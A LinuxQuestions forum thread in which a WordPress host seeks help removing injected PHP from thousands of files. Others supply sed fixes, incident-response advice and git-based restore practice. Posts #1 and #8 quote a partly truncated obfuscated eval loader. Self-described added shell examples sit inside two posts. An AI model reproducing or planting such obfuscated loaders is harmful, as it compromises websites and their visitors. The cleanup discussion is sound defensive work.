LinuxQuestions.org
Old 07-29-2014, 12:46 PM   #1
GoofySmurf
LQ Newbie
 
Registered: Jan 2008
Posts: 6

Rep: Reputation: 0
Help removing php injected code


Hello

Recently we had massive php code injected on most of our wordpress sites. I am trying to remove the code but there are a few thousand php files. On most of the sites I just replace the top line with the php tag again but this does not work on all the sites.

The command I use is:


find . -name "*.php" -exec sed -i '1 s/.*/<?php/' '{}' \;

My only solution would be to remove the offending code that was injected, but I cannot for the life of me figure it out.

Below is the string I need to remove:

Code:
<?php $tyyqpbrwjq = '6*CW&)7gj6<.[A%x5c%x7827&6<%x#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj>>*4-1-
bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)jpp3)%x5c%x7825cB%x5c%x5c%x785c1^-%x5c%x7^W%x5c%x78
25c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825c825)ppde>u%x5c%x7825V<#65,47R25,d7R17825:-t%x5c%x782
5)3of:opjudovg<~%x5c%x)!>>%x5c%x7822!ftmbg)!gj%x7825-#1]#-
bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x55c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%
x7827&6<*rfx5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3!<**qp%x5c%x7825!-uyfu%x5c%x78273:8
(..)epreg_replaceebdkabappx'; $auobcvnlfq = explode(chr((204-160)),'8482,58,5140,45,7992,50,8368,51
,43,2719,33,8341,27,9760,57,1148,25,1710,40,750,61,2775,53,5366,36,2503,44,6603,66,3475,36,6484,50,
(..); if (!function_exists('pliyupuqyg')) { function pliyupuqyg($qxsysxwnvl, $nlerhlrclx) { $nrygpq
onlc = NULL; for($ipdahrsiab=0;$ipdahrsiab<(sizeof($qxsysxwnvl)/2);$ipdahrsiab++) { $nrygpqonlc .= 
substr($nlerhlrclx, $qxsysxwnvl[($ipdahrsiab*2)],$qxsysxwnvl[($ipdahrsiab*2)+1]); } return $nrygpqo
nlc; };} $fsfynqhavn="\x20\57\x2a\40\x70\157\x68\160\x76\153\x70\151\x6c\147\x20\52\x2f\40\x65\166\
x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\62\x30\55\x38\63
(..) NULL); $wwbtewlrap=$fsfynqhavn; $wwbtewlrap=(821-700); $tyyqpbrwjq=$wwbtewlrap-1; ?>
Any assistance will be appreciated.

Last edited by unSpawn; 07-31-2014 at 02:45 PM. Reason: //No use pasting code unless you have the decryption key
 
Old 07-29-2014, 12:51 PM   #2
szboardstretcher
Senior Member
 
Registered: Aug 2006
Location: Detroit, MI
Distribution: GNU/Linux systemd
Posts: 4,278

Rep: Reputation: 1694
That sucks. This is why I don't like wordpress.

Anyway, if you want to remove that section from a file, and it is the same in every file, then:

Code:
sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d'
will get rid of it from a file for you.
 
Old 07-29-2014, 01:00 PM   #3
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
How'd the code get there is the real question.
 
Old 07-29-2014, 01:14 PM   #4
GoofySmurf
LQ Newbie
 
Registered: Jan 2008
Posts: 6

Original Poster
Rep: Reputation: 0

Yup, the long and thorough investigation will start as soon as I remove this injected code :P

Thank you for the reply and command, but it does not seem to work.

I am running the following command:

find . -name "*.php" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

The command seems to delete all the content of the file.

PS: I'm quite a noob with sed and find and only managed to construct my first command from other examples online.

Last edited by GoofySmurf; 07-29-2014 at 01:28 PM.
 
Old 07-29-2014, 01:30 PM   #5
astrogeek
Moderator
 
Registered: Oct 2008
Distribution: Slackware [64]-X.{0|1|2|37|-current} ::12<=X<=15, FreeBSD_12{.0|.1}
Posts: 6,263
Blog Entries: 24

Rep: Reputation: 4194
Quote:
Originally Posted by Habitual View Post
How'd the code get there is the real question.
That is indeed the question!

While not an expert, I have had recent opportunity to do a little forensic work of my own on a couple of
similarly corrupted sites.

Here are some thoughts that come immediately to mind:

0. Take the sites offline immediately... put up a "Temporarily unavailable..." page to handle ALL http
requests until resolved - otherwise you may be playing real-time cat and mouse. Change ALL passwords
immediately - FTP accounts, Wordpress, CPanel (or other UI), emails, database... everything -
before you begin!

1. Secure all logs and a complete snapshot of the server to a local platform if you intend to do any
forensics (highly recommended)!

2. There will be an original vector not apparent from the modified files. You may (or may not) be able to
identify it by reviewing the server logs. Typically there will have been multiple stages leading to the
currently visible code, some of which will have been removed already.

3. Simply removing the visibly affected code from files will not allow you to clean up the site(s). There
will be additional vectors installed from which they will simply re-install, ad infinitum. The ONLY way
to clean it up short of a total reinstall will be if you have a clean backup stored offsite from which to
identify and restore files. A simple restore from recent backup will not get rid of it if the backup contains
a vector - very likely for any recent backup.

It will be very difficult to simply clean it up, and virtually impossible to know with any confidence that
you have gotten everything. If you try to simply sed the code as described they will be back!

They currently own your site and the only way to confidently evict them is to wipe it down to the metal and
reinstall from clean sources... sorry to say, but mostly the truth in my limited but painful experience.
 
Old 07-29-2014, 01:33 PM   #6
szboardstretcher
Senior Member
 
Registered: Aug 2006
Location: Detroit, MI
Distribution: GNU/Linux systemd
Posts: 4,278

Rep: Reputation: 1694
Must have done something incorrect. Here is my example, using this very page:

Code:
#Get this page into TESTFILE
wget -O TESTFILE http://www.linuxquestions.org/questi...7/#post5211483

#Grep and count the instances of 'tyy' which is in that code mentioned...
grep tyy TESTFILE|wc -l
3

#Find the TESTFILE and run sed on it to remove the code...
find . -name "TESTFILE" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

#Grep and count the instances of 'tyy' again
grep tyy TESTFILE|wc -l
0

#Grep number of lines the letter 'p' is in TESTFILE now (indicating that it did not delete everything)
grep p TESTFILE|wc -l
489
 
Old 07-29-2014, 01:40 PM   #7
GoofySmurf
LQ Newbie
 
Registered: Jan 2008
Posts: 6

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by astrogeek View Post
That is indeed the question!

While not an expert, I have had recent opportunity to do a little forensic work of my own on a couple of
similarly corrupted sites.

Here are some thoughts that come immediately to mind:

0. Take the sites offline immediately... put up a "Temporarily unavailable..." page to handle ALL http
requests until resolved - otherwise you may be playing real-time cat and mouse. Change ALL passwords
immediately - FTP accounts, Wordpress, CPanel (or other UI), emails, database... everything -
before you begin!

1. Secure all logs and a complete snapshot of the server to a local platform if you intend to do any
forensics (highly recommended)!

2. There will be an original vector not apparent from the modified files. You may (or may not) be able to
identify it by reviewing the server logs. Typically there will have been multiple stages leading to the
currently visible code, some of which will have been removed already.

3. Simply removing the visibly affected code from files will not allow you to clean up the site(s). There
will be additional vectors installed from which they will simply re-install, ad infinitum. The ONLY way
to clean it up short of a total reinstall will be if you have a clean backup stored offsite from which to
identify and restore files. A simple restore from recent backup will not get rid of it if the backup contains
a vector - very likely for any recent backup.

It will be very difficult to simply clean it up, and virtually impossible to know with any confidence that
you have gotten everything. If you try to simply sed the code as described they will be back!

They currently own your site and the only way to confidently evict them is to wipe it down to the metal and
reinstall from clean sources... sorry to say, but mostly the truth in my limited but painful experience.
Thank you for the advice. The affected server is already disconnected from the net and the sites were moved to another brand new Debian 7 web server; the reason I am trying to clean the visible code from the sites is just to get them up and running in the meantime while the developers can comb through the sites' code.

You are correct that 6 months' worth of backups do have similar code popping up on some pages.

I understand what you are saying, but it will be a quick fix to at least maintain some form of uptime while it can be properly fixed.
 
Old 07-29-2014, 02:21 PM   #8
GoofySmurf
LQ Newbie
 
Registered: Jan 2008
Posts: 6

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by szboardstretcher View Post
Must have done something incorrect. Here is my example, using this very page:

Code:
#Get this page into TESTFILE
wget -O TESTFILE http://www.linuxquestions.org/questi...7/#post5211483

#Grep and count the instances of 'tyy' which is in that code mentioned...
grep tyy TESTFILE|wc -l
3

#Find the TESTFILE and run sed on it to remove the code...
find . -name "TESTFILE" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

#Grep and count the instances of 'tyy' again
grep tyy TESTFILE|wc -l
0

#Grep number of lines the letter 'p' is in TESTFILE now (indicating that it did not delete everything)
grep p TESTFILE|wc -l
489

It does work if I test it the way you did as well, but if I run it against, let's say, wp-trackback.php, it empties the file:

Here is the code for wp-trackback.php:

Code:
<?php (..) if (!function_exists('pliyupuqyg')) { function pliyupuqyg($qxsysxwnvl, $nlerhlrclx) { $nrygpqonlc = NULL; 
for($ipdahrsiab=0;$ipdahrsiab<(sizeof($qxsysxwnvl)/2);$ipdahrsiab++) { $nrygpqonlc .= substr($nlerhlrclx, $qxsysxwnvl
[($ipdahrsiab*2)],$qxsysxwnvl[($ipdahrsiab*2)+1]); } return $nrygpqonlc; };} $fsfynqhavn="\x20\57\x2a\40\x70\157\x68
\160\x76\153\x70\151\x6c\147\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x
68\162\x28\50\x31\62\x30\55\x38\63\x29\51\x2c\40\x63\150\x72\50\x28\64\x35\71\x2d\63\x36\67\x29\51\x2c\40\x70\154\x6
9\171\x75\160\x75\161\x79\147\x28\44\x61\165\x6f\142\x63\166\x6e\154\x66\161\x2c\44\x74\171\x79\161\x70\142\x72\167\
x6a\161\x29\51\x29\73\x20\57\x2a\40\x63\166\x79\165\x71\144\x75\171\x76\172\x20\52\x2f\40"; $wwbtewlrap=substr($tyyq
pbrwjq,(62760-52647),(59-47)); $wwbtewlrap($kyptwpgzbr, $fsfynqhavn, NULL); $wwbtewlrap=$fsfynqhavn; $wwbtewlrap=(8
21-700); $tyyqpbrwjq=$wwbtewlrap-1; ?><?php
/**
 * Handle Trackbacks and Pingbacks sent to WordPress
 *
 * @package WordPress
 */

if (empty($wp)) {
	require_once('./wp-load.php');
	wp( array( 'tb' => '1' ) );
}

/**
 * trackback_response() - Respond with error or success XML message
 *
 * @param int|bool $error Whether there was an error
 * @param string $error_message Error message if an error occurred
 */
function trackback_response($error = 0, $error_message = '') {
	header('Content-Type: text/xml; charset=' . get_option('blog_charset') );
	if ($error) {
		echo '<?xml version="1.0" encoding="utf-8"?'.">\n";
		echo "<response>\n";
		echo "<error>1</error>\n";
		echo "<message>$error_message</message>\n";
		echo "</response>";
		die();
	} else {
		echo '<?xml version="1.0" encoding="utf-8"?'.">\n";
		echo "<response>\n";
		echo "<error>0</error>\n";
		echo "</response>";
	}
}

// trackback is done by a POST
$request_array = 'HTTP_POST_VARS';

if ( !isset($_GET['tb_id']) || !$_GET['tb_id'] ) {
	$tb_id = explode('/', $_SERVER['REQUEST_URI']);
	$tb_id = intval( $tb_id[ count($tb_id) - 1 ] );
}

$tb_url  = isset($_POST['url'])     ? $_POST['url']     : '';
$charset = isset($_POST['charset']) ? $_POST['charset'] : '';

// These three are stripslashed here so that they can be properly escaped after mb_convert_encoding()
$title     = isset($_POST['title'])     ? stripslashes($_POST['title'])      : '';
$excerpt   = isset($_POST['excerpt'])   ? stripslashes($_POST['excerpt'])    : '';
$blog_name = isset($_POST['blog_name']) ? stripslashes($_POST['blog_name'])  : '';

if ($charset)
	$charset = str_replace( array(',', ' '), '', strtoupper( trim($charset) ) );
else
	$charset = 'ASCII, UTF-8, ISO-8859-1, JIS, EUC-JP, SJIS';

// No valid uses for UTF-7
if ( false !== strpos($charset, 'UTF-7') )
	die;

if ( function_exists('mb_convert_encoding') ) { // For international trackbacks
	$title     = mb_convert_encoding($title, get_option('blog_charset'), $charset);
	$excerpt   = mb_convert_encoding($excerpt, get_option('blog_charset'), $charset);
	$blog_name = mb_convert_encoding($blog_name, get_option('blog_charset'), $charset);
}

// Now that mb_convert_encoding() has been given a swing, we need to escape these three
$title     = $wpdb->escape($title);
$excerpt   = $wpdb->escape($excerpt);
$blog_name = $wpdb->escape($blog_name);

if ( is_single() || is_page() )
	$tb_id = $posts[0]->ID;

if ( !isset($tb_id) || !intval( $tb_id ) )
	trackback_response(1, 'I really need an ID for this to work.');

if (empty($title) && empty($tb_url) && empty($blog_name)) {
	// If it doesn't look like a trackback at all...
	wp_redirect(get_permalink($tb_id));
	exit;
}

if ( !empty($tb_url) && !empty($title) ) {
	header('Content-Type: text/xml; charset=' . get_option('blog_charset') );

	if ( !pings_open($tb_id) )
		trackback_response(1, 'Sorry, trackbacks are closed for this item.');

	$title =  wp_html_excerpt( $title, 250 ).'...';
	$excerpt = wp_html_excerpt( $excerpt, 252 ).'...';

	$comment_post_ID = (int) $tb_id;
	$comment_author = $blog_name;
	$comment_author_email = '';
	$comment_author_url = $tb_url;
	$comment_content = "<strong>$title</strong>\n\n$excerpt";
	$comment_type = 'trackback';

	$dupe = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d AND comment_author_url = %s", $comment_post_ID, $comment_author_url) );
	if ( $dupe )
		trackback_response(1, 'We already have a ping from that URL for this post.');

	$commentdata = compact('comment_post_ID', 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type');

	wp_new_comment($commentdata);

	do_action('trackback_post', $wpdb->insert_id);
	trackback_response(0);
}
?>
and this is the command I run:

Code:
find . -name "wp-trackback.php" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

Last edited by unSpawn; 07-31-2014 at 02:42 PM. Reason: //No use pasting code unless you have the decryption key
 
Old 07-29-2014, 02:32 PM   #9
szboardstretcher
Senior Member
 
Registered: Aug 2006
Location: Detroit, MI
Distribution: GNU/Linux systemd
Posts: 4,278

Rep: Reputation: 1694
Ok. Thanks for the actual code. You would need this to clear out that single enormous line, without affecting your leading php statement:

Code:
sed 's/<?php $tyyqpbrwjq.*$wwbtewlrap-1; ?>//' PHPFILE
Test her out and see what you think.
 
1 members found this post helpful.
Old 07-29-2014, 02:46 PM   #10
GoofySmurf
LQ Newbie
 
Registered: Jan 2008
Posts: 6

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by szboardstretcher View Post
Ok. Thanks for the actual code. You would need this to clear out that single enormous line, without affecting your leading php statement:

Code:
sed 's/<?php $tyyqpbrwjq.*$wwbtewlrap-1; ?>//' PHPFILE
Test her out and see what you think.
I humbly thank you for all your time and effort spent to assist me. I finally have it working, and for interest's sake here is the command I use.

Code:
find . -name "*.php" -exec sed -i 's/<?php $tyyqpbrwjq.*$wwbtewlrap-1; ?>//' '{}' \;
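
Why the range delete from post #2 emptied wp-trackback.php while the substitution from post #9 did not, as an added example that is not part of any poster's reply. The function names and the sample file are constructed for illustration; only the two marker strings come from the thread.

```shell
#!/bin/sh
# Added example, not from the thread. The sample file is constructed; only the
# two marker strings ($tyyqpbrwjq ... $wwbtewlrap-1; ?>) come from the posts.

# Build a constructed "infected" file in which the injected block and the real
# opening tag share line 1, as in the wp-trackback.php paste.
make_sample() {
    printf '%s\n' \
        "<?php \$tyyqpbrwjq = 'CONSTRUCTED-PLACEHOLDER'; \$tyyqpbrwjq=\$wwbtewlrap-1; ?><?php" \
        '/** legitimate file body */' \
        'echo "hello";' \
        '?>' > "$1"
}

# Range delete from post #2, without -i. sed only starts looking for the end
# address on the line AFTER the one that matched the start address, so with
# both markers on line 1 the range never closes and runs to end of file.
range_delete_lines() {
    sed '/<?php \$tyyqpbrwjq/,/\$wwbtewlrap-1; ?>/d' "$1" | wc -l | tr -d ' '
}

# List PHP files under directory $1 that contain the start marker (fixed string).
infected_files() {
    find "$1" -type f -name '*.php' \
        -exec grep -lF -e '<?php $tyyqpbrwjq' {} + || true
}

# Substitution from post #9: removes only the text between the markers on a
# line. The original is copied aside first and the cleaned text is written back
# into the existing file, so ownership and mode are unchanged.
clean_file() {
    cp -p "$1" "$1.infected.bak" || return 1
    sed 's/<?php \$tyyqpbrwjq.*\$wwbtewlrap-1; ?>//' "$1.infected.bak" > "$1"
}

# Clean every listed file under $1 (file names containing newlines are not handled).
clean_tree() {
    list=$(infected_files "$1")
    printf '%s\n' "$list" | while IFS= read -r f; do
        [ -n "$f" ] || continue
        clean_file "$f"
    done
}

# Demo on a throwaway directory.
demo_dir=$(mktemp -d)
make_sample "$demo_dir/wp-sample.php"
echo "lines left by range delete: $(range_delete_lines "$demo_dir/wp-sample.php")"
echo "infected before: $(infected_files "$demo_dir" | wc -l | tr -d ' ')"
clean_tree "$demo_dir"
echo "infected after:  $(infected_files "$demo_dir" | wc -l | tr -d ' ')"
rm -rf "$demo_dir"
```

The `.infected.bak` copies still contain the injected block, so move them out of the web root once the result has been checked.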
 
Old 07-29-2014, 04:45 PM   #11
salasi
Senior Member
 
Registered: Jul 2007
Location: Directly above centre of the earth, UK
Distribution: SuSE, plus some hopping
Posts: 4,070

Rep: Reputation: 897
You might want to check this out; it is one of several recent WP vulns.

Here's a quote

"To be clear, the MailPoet vulnerability is the entry point, it doesn't mean your website has to have it enabled or that you have it on the website; if it resides on the server, in a neighbouring website, it can still affect your website."

Of course, the fact that there are a few Wordpress vulns means that this may or may not be your vuln, but it is worth checking out.
 
Old 07-30-2014, 09:20 AM   #12
sundialsvcs
LQ Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,659
Blog Entries: 4

Rep: Reputation: 3939
Obviously, you need to beef-up the security of these boxes. (If you're using "easy, convenient" computer-management software such as Plesk, that's almost certainly how they got in.)

Then, you need to be able to have the "authoritative" source-code of the entire site in a version-control system somewhere ... somewhere else, including several physical backups in a safe-box somewhere ... by which you can restore the system by "checking-out" the correct branch from the repository on top of the corrupted code that is there. Presto! The source-code control system (say, "git") will automatically resynchronize everything to match this known-good state ... removing files that were added and replacing ones that were changed.

You need this very-fundamental capability for any and every system that you manage ... to deal with any sort of problem, including your own "oops."

(Nothing makes a computer-guy's blood run cold, than to hear someone nearby say, "oops ..." in that certain hollow tone of voice ... And nothing makes him feel better than to know, with certainty, that the mistake, whatever it was, can be reversed with a simple "Shazam!")

Last edited by sundialsvcs; 07-30-2014 at 09:22 AM.
 
Old 07-31-2014, 02:42 AM   #13
GoofySmurf
LQ Newbie
 
Registered: Jan 2008
Posts: 6

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by sundialsvcs View Post
Obviously, you need to beef-up the security of these boxes. (If you're using "easy, convenient" computer-management software such as Plesk, that's almost certainly how they got in.)

Then, you need to be able to have the "authoritative" source-code of the entire site in a version-control system somewhere ... somewhere else, including several physical backups in a safe-box somewhere ... by which you can restore the system by "checking-out" the correct branch from the repository on top of the corrupted code that is there. Presto! The source-code control system (say, "git") will automatically resynchronize everything to match this known-good state ... removing files that were added and replacing ones that were changed.

You need this very-fundamental capability for any and every system that you manage ... to deal with any sort of problem, including your own "oops."

(Nothing makes a computer-guy's blood run cold, than to hear someone nearby say, "oops ..." in that certain hollow tone of voice ... And nothing makes him feel better than to know, with certainty, that the mistake, whatever it was, can be reversed with a simple "Shazam!")
We don't use any control panels for our hosting or common passwords. All the passwords are 52 characters with punctuation marks mixed in-between.

Thanks for the recommendation. I never considered backing up client wp sites with git; it's actually a great idea, thanks.
 
Old 07-31-2014, 07:28 PM   #14
sundialsvcs
LQ Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,659
Blog Entries: 4

Rep: Reputation: 3939
Git (version-control ...) should be a fundamental part of your "deployment" process. Within your own shop, you have a master repository ... replicated many places constantly, including some that are offline ... and this is where the crown-jewels are stored.

Every client site contains a duplicate repository (which is "pulled," but never "pushed") which cannot be written-to by anyone. At any time, this repo can be pulled from the master, and the site files can then be brought to their correct deployed-state by switching to the client's deployment-master branch and pulling at a specified tag.

This should be done by a single "maintenance" user-id (which is not root ...), which owns all of the released files and which write-protects all of them (as well as the directories). No files can be altered, added, or removed, unless you break into root or that particular user. And the only way to "ssh" into that user is through possession of the correct private key, which only your deployment-team possesses. (Passwords can't be used to ssh into anything anywhere, in fact.)

A lot of the trick of "pragmatic web-server security" is simply taking the necessary precautions that make your systems "not trivially-easy to get into." Most web-site intruders are strictly opportunists. If they encounter even a slightly-locked door or window, they'll just move on to the next house. Fact is, most systems out there are "trivially easy to break into!" (You really don't have to "break" a window if it's open, now do you?)
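
The "bring the site back to a tagged state" step described in posts #12 and #14, as an added example that is not any poster's code: it lists every file that differs from a release tag (changed, deleted or added) and then reverts the tree. The repository layout, tag name `release-1.0`, file names and function names are all constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. Repository, tag and file names are
# constructed; a real deployment checkout would be pulled from the master repo.

# Create a throwaway "deployed site" repository with one tagged release.
make_deploy() {
    git init -q "$1"
    printf '<?php\necho "index";\n' > "$1/index.php"
    git -C "$1" add index.php
    git -C "$1" -c user.name=deploy -c user.email=deploy@example.invalid \
        commit -q -m 'release 1.0'
    git -C "$1" tag release-1.0
}

# Print every path in checkout $1 that differs from tag $2:
#   - tracked files that were modified or deleted (git diff against the tag)
#   - files that exist on disk but not in the repository, ignored ones
#     included, because an added file can sit in an ignored path
drift() {
    {
        git -C "$1" diff --name-only "$2" --
        git -C "$1" ls-files --others
    } | sort -u
}

# Force checkout $1 back to tag $2 and delete everything the tag does not
# contain. This also deletes legitimate untracked data (for example uploaded
# media), so such directories must live outside the checkout or be backed up.
restore() {
    git -C "$1" reset -q --hard "$2"
    git -C "$1" clean -q -fdx
}

# Demo: tamper with one tracked file, add one new file, detect, restore.
site=$(mktemp -d)/site
make_deploy "$site"
printf '/* constructed stand-in for injected code */\n' >> "$site/index.php"
printf '<?php /* constructed added file */\n' > "$site/added-file.php"
echo "drift before restore:"
drift "$site" release-1.0
restore "$site" release-1.0
echo "paths still differing: $(drift "$site" release-1.0 | wc -l | tr -d ' ')"
rm -rf "$(dirname "$site")"
```

Save the `drift` output before running `restore`: the list of changed and added paths is evidence for the investigation, and `restore` destroys it.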
 
Old 08-01-2014, 12:51 AM   #15
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Over the years I've advocated a specific approach to handling security incidents in which what to do afterwards has its place but only after we've ensured the OP has mitigated the risks, has investigated the breach where possible and has shown an understanding of what was missing security posture-wise. The use of versioning is nice but it does not prevent anything security-related. And to launch into a description extolling its virtues seems rather premature and distracting when the OP has not yet shown he has a grip on basic system and application security (and still appears to want to expose a system after cleaning it up). So thinking like a coder in my humble opinion is nice but now is not the time for it: first things first I'd say.

@OP: since you have shown this started about six months ago: what item or items have you isolated as the source of the infection and what are the exact measures you take to combat this?
 
  

